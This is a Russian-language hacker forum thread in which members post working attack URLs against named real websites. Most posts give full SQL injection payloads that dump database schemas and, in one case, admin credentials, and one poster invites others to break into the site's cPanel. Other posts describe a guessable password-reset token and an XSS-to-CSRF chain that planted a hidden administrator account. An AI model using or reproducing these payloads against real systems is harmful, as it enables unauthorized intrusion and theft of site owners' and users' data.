HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.04.2016, 16:37
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

Саит http://www.francophonie.utm.md/

Уязвимость: SQL Injection

Сплоит http://www.francophonie.utm.md/?mop=...sion(),7,8+--+
 
Ответить с цитированием

  #2  
Старый 26.08.2016, 00:30
MaxxWell
Познающий
Регистрация: 05.01.2016
Сообщений: 31
С нами: 5450006

Репутация: 0
По умолчанию

Код:
http://kupigut.ru/shop.php?id=-fashionid%27+union+all+select+1,2,3,4,5,6,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),8,9,10,11,12+--+
Тип: SQL Injection.

================================================== ========



Код:
http://hd-ural.ru/news.php?news_id=-48+union+all+select+1,2,3,4,5,6,7,8,9,10,11,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),13,14+--+
Тип:
SQL Ijection (вывод в title, Cntr+u)

================================================== ========



Код:
http://allrose.ru/category.php?id=-1%27+union+all+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)+--+




Тип:
SQL Injection
 
Ответить с цитированием

  #3  
Старый 28.08.2016, 23:21
NonBlizz
Новичок
Регистрация: 27.08.2016
Сообщений: 16
С нами: 5111606

Репутация: 0
По умолчанию

ТИЦ:10PR:2

Код:
ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,concat_ws(database(),user(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
Вывод таблиц:

Код:
ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,user(),3,4,5,6,7,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),9,10,11,12,13,14,15,16+--+
Вывод админа:

Код:
ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,user(),3,4,5,6,7,concat_ws(0x3,username,password),9,10,11,12,13,14,15,16+from+heterodrugs.users+--+
Version (5.5.49-cll-lve)

Database (heterodrugs)

User (hetero582016@localhost)


Для простоты действий:

ttp://heteroworld.com/cpanel/

ttp://heteroworld.com/info.php


P.S в Cpanel с этими данными так и не смог зайти. Кто зальётся отпишитесь=)
 
Ответить с цитированием

  #4  
Старый 14.09.2016, 00:02
PoliGroS
Познающий
Регистрация: 29.03.2012
Сообщений: 77
С нами: 7432886

Репутация: 0
По умолчанию

Цитата:
Сообщение от MaxxWell  

Код:
http://kupigut.ru/shop.php?id=-fashionid%27+union+all+select+1,2,3,4,5,6,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),8,9,10,11,12+--+
Тип:
SQL Injection.
Запрещено постить уязвимости на сайтах стран СНГ (ru, by, ua).

Для наглядности баллы будут в ручном режиме добавляться в таблицу: https://yarbabin.ru/antichat/ - нет никакой статистики.
 
Ответить с цитированием

  #5  
Старый 26.03.2017, 13:12
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

Предсказываем отправлений url при восстановлении пароля md5(time()) взламываем любои аккаунт

Код:
https://www.andys.md/ro/pages/login/
http://www.andys.md/pages/restore_pass/24aedcd90a28ae58303e0a8b8906137b/
 
Ответить с цитированием

  #6  
Старый 03.08.2017, 15:14
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

2 XSS и 1 CSRF беспалевный взлом, Исправили но все таки раскажу )

При осуществление заказа поле имя уязвимо к xss которая срабатывает в панели администратора

Код:
http://supergut.md/ru/pages/cart/3/
Сколько я бы не старался украсть куки они не работали незнаю почему (HttpOnly небыл выставлен к кукам и по IP тоже небыло ограничении)

Решил попробовать CSRF атаку потому что структура админ панели мне было известно, а именно POST CSRF на добавление админа так выглядел сплоит

Код:
   
     
       tr:last-child{display:none;}">
Почему в логине

Код:
tr:last-child{display:none;}
потому что так я мог добавлять невидимого юзера через другую инекцию в админке спрятав последнюю строку таблице

Далее я решил использовать и ту же xss из поле имя чтоб средиректить админа на мою CSRF сделал так

Код:
  location="http://host/csrf.html";
Не прошло и 5 минут я был уже в админке



После этого была оповещена администрация которая на 2 день профиксела
 
Ответить с цитированием

  #7  
Старый 03.08.2017, 21:15
SooLFaa
Постоянный
Регистрация: 17.03.2014
Сообщений: 530
С нами: 6398966

Репутация: 154


По умолчанию

Цитата:
Сообщение от Octavian  

2 XSS и 1 CSRF беспалевный взлом, Исправили но все таки раскажу )
При осуществление заказа поле имя уязвимо к xss которая срабатывает в панели администратора
Код:
http://supergut.md/ru/pages/cart/3/
Сколько я бы не старался украсть куки они не работали незнаю почему (HttpOnly небыл выставлен к кукам и по IP тоже небыло ограничении)
Решил попробовать CSRF атаку потому что структура админ панели мне было известно, а именно POST CSRF на добавление админа так выглядел сплоит
Код:
   
     
       tr:last-child{display:none;}">
Почему в логине
Код:
tr:last-child{display:none;}
потому что так я мог добавлять невидимого юзера через другую инекцию в админке спрятав последнюю строку таблице
Далее я решил использовать и ту же xss из поле имя чтоб средиректить админа на мою CSRF сделал так
Код:
  location="http://host/csrf.html";
Не прошло и 5 минут я был уже в админке

После этого была оповещена администрация которая на 2 день профиксела
Очень хорошая демонстрация, как XSS и CSRF на практике применяется.
 
Ответить с цитированием

  #8  
Старый 29.08.2017, 21:05
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

Раскрытие данных

Код:
http://www.termosuport.md/admin/
 
Ответить с цитированием

  #9  
Старый 17.09.2017, 11:51
tro0st
Новичок
Регистрация: 28.07.2017
Сообщений: 14
С нами: 4629206

Репутация: 0
По умолчанию

Цитата:
Сообщение от Erpeitupoi  

Приветствую форумчане, подскажите пожалуйста нубу, можно ли как-то узнать привязана ли к номеру телефона страница в вк? Соррян за оффтоп, пока не могу отвечать в теме "В контакте".
Восстановление пароля, "не помню номер телефона"(если такое выскачило, то привязана), вводишь данные страницы, ФИО и получаешь ответ на свой вопрос.
 
Ответить с цитированием

  #10  
Старый 17.09.2017, 22:56
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

Цитата:
Сообщение от BabaDook  

Будь осторожен с этим.

Зачем
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.